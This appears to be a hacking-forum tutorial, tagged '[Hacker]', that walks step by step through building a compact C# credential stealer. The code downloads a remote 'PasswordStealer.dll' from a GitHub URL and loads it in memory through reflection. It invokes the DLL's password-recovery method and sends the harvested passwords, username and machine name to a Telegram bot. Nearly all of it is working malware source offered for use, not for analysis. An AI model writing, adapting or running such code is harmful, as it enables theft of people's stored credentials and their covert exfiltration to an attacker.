Dynamic DLL loading (writing a 9kb stealer)

[Hacker]

We will use the System.Reflections namespace

Reflection is the process of identifying types at runtime. Each application contains a set of used classes, interfaces, as well as their methods, properties and other building blocks that make up the application. And reflection just allows you to determine all these constituent elements of the application blah-blah-blah

public static byte[] GetLibrary()
{
    byte[] dll = new byte[0];
    string url = "https://raw.githubusercontent.com/L1ghtM4n/DynamicStealer/main/DLL/PasswordStealer.dll";
    using (var client = new WebClient())
    {
        try {
            dll = client.DownloadData(url);
        } catch (WebException) {
            Environment.Exit(1);
        }
    }
    return dll;
}

Now let's write the GetPasswords function which

• accepts dllki bytes
• loads it
• calls the function from there
• and returns passwords to us

public static string GetPasswords(byte[] dll)
{
    // Load dllku
    Assembly asm = Assembly.Load(dll);
    // Create an instance
    dynamic instance = Activator.CreateInstance(
        asm.GetType("PasswordStealer.Stealer"));
    // Get the function of recovering passwords from dllki
    MethodInfo runMethod = instance.GetType().GetMethod("Run",
        BindingFlags.Instance | BindingFlags.Public);
    // Call the password recovery method
    string passwords = (string)runMethod.Invoke(
        instance, new object[] { });
    // Return the passes
    return passwords;
}

The UploadReport function will send passwords to the cart
C#:

public static bool UploadReport(string passwords)
{
    string report = $"*New report*\n" +
        $"*UserName:* {Environment.UserName}\n" +
        $"*CompName:* {Environment.MachineName}\n\n" +
        $"*Passwords:* \n{passwords}";
    string telegram_api = "https://api.telegram.org/bot";
    using (var client = new WebClient())
    {
        try
        {
            string response = client.DownloadString(
                telegram_api + "<TOKEN>" +
                "/sendMessage?chat_id=<CHAT_ID>"+
                "&text=" + report +
                "&disable_web_page_preview=True" +
                "&parse_mode=Markdown"
            );
            return response.Contains("\"ok\":true,");
        }
        catch (WebException)
        {
            return false;
        }
    }
}

And the main function
C#:

static void Main()
{
    // This is necessary for correct sending
    ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls
                                         | SecurityProtocolType.Tls11
                                         | SecurityProtocolType.Tls12
                                         | SecurityProtocolType.Ssl3;

    byte [] dll = GetLibrary (); // Download dll bytes
    string pwd = GetPasswords (dll); // Call dll methods and return passwords
    UploadReport (pwd); // Send passwords to the Telegram bot
}